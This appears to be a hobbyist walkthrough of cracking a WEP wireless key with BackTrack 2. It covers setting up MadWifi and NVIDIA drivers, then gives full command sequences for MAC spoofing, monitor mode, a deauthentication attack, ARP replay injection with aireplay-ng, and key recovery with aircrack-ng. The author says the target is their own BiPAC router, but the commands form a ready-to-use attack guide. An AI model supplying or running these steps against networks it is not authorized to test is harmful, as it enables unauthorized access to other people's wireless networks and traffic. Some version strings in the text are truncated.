Getting it together

Like all Linux O/S get information about your machine first before installing a Linux distro
I have a Netgear WPN311 that uses the Atheros Chip, they retail for about $40 - $50. So I downloaded the Madwifi drivers. The current being madwifi- and upload it onto a thumb drive (USB stick).
I also use a XFX geforce8600 go to hxxp://.nvidia.c0m
And also upload it to the Thumb Drive My access point I’m cracking is a BiPAC 7300(G)
(802.11g) ADSL2+ Firewall Modem/Router with EZSO and QoS

Login to BT2


Type mount to list all mounted devices eg, c:\ d:\ floppy, CD-ROM, USB removable media

bt ~ # mount
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
usbfs on /proc/bus/usb type usbfs (rw,devgid=10,devmode=0666)
/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)
/dev/sdb1 on /mnt/sdb1 type ntfs (ro,noatime)
/dev/sdc on /mnt/sdc_removable type vfat (rw,noatime)

bt ~ # cd /mnt/sdc_removable
bt sdc_removable # ls
?????.docx* lazy.txt*
Inside\ Open\ Source\ Using\ John\ the\ Ripper.htm* lilo*
Inside\ Open\ Source\ Using\ John\ the\ Ripper_files/ madwifi-*
John\ the\ Ripper\ Tutorial.htm* madwifi-*
John\ the\ Ripper\ Tutorial_files/ madwifi-*
Kismet-Nov-07-2007-1.csv* madwifi_howtoo.php.htm** madwifi_howtoo.php_files/

Surprising enough it’s easy to install the NVIDIA drivers this is how to do it

HINT** Type sh and N then press Tab to automatically find the file

Type "sh" to install the driver. NVIDIA now provides a utility to assist
You with configuration of your Xconfig file

Select: Accept, No, Yes, Yes.

Dual core is disabled in BT to enable use the "dbt" command

OK now for BT beautiful GUI
Type "startx"
You will see the GUI and the cool surround sound start up!


Create a new folder in you're root directory, it doesn't have to be in root it can be anywhere.
and copy your madwifi driver accross from the thumb drive to the new folder. Then cd to the new folder.

bt ~ # cd /root/madwifi
bt madwifi # ls
bt madwifi # tar -xvzf madwifi-

Removing the old and in with the new!

# cd madwifi-
# cd scripts
# ifconfig ath0 down
# wlanconfig ath0 destroy
# ./madwifi-unload.bash
# ./ $(uname -r)

You will see this warning hit the Y key
It seems that there are modules left from previous MadWifi installations.
If you are unistalling the MadWifi modules please press "r" to remove them.
If you are installing new MadWifi modules, you should consider removing those
already installed, or else you may experience problems during operation.
Remove old modules?

[l]ist, [r]emove, [i]gnore or e[x]it (l,r,i,[x]) ?


bt scripts #
# cd .. (Back one directory)
# make && make install
This takes about 20 seconds

bt madwifi- # modprobe ath_pci

Do the same for Aircrack-ng or download Balding_parrots modules!

Done! Now you can set the monitor mode and we need to change the password of the root
Account so we can lock the screen if cracking process takes over night.
# passwd root

# airmon-ng start wifi0
# wlanconfig ath0 destroy

If you need to change your MAC address here is the time

# macchanger --mac 00:14:A5:A6:82:70 ath1
Current MAC: 01:11:41:11:11:11 (unknown)
Faked MAC: 00:55:A5:55:82:55 (unknown)
# ifconfig ath1 up

Run kismet and choose ath1 you will se your AP there and the channel get the SSID and MAC of the AP plus channel

My ssid and AP plus Station MAC
SSID : "BAd-Wifi" (notice the brackets because I use special characters)
BSSID : 00:60:55:1C:63:55
STATION :00:55:A5:55:82:55

you may have to run the airmon-ng stop wifi0 and ifconfig ath1 down and airmon-ng start wifi0 again as kismet stuffs the nic!

I just use the aircrack-ng ath1 to get my AP and Station MAC channel of my AP
now to put into monitor mode on the correct channel
# iwconfig ath1 mode monitor channel 6

(This will force your Nic to use channel 6! so no matter what channel you allocate in airodump-ng to use it will use 6)

With Clients!

Death Attack


# aireplay-ng -e "BAd-Wifi" -a 00:60:55:1C:63:55 -c 00:55:A5:55:82:55 --deauth 19 ath1

# aireplay-ng --arpreplay -b 00:60:55:1C:63:55 -h 00:55:A5:55:82:55 ath1
and watch the DATA fly!!!!

Wait patently until you have 1 million IV's


aircrack-ng -m 00:60:55:1C:63:55 -128 /root/rcapture-01.cap

about 1 second latter

[key found]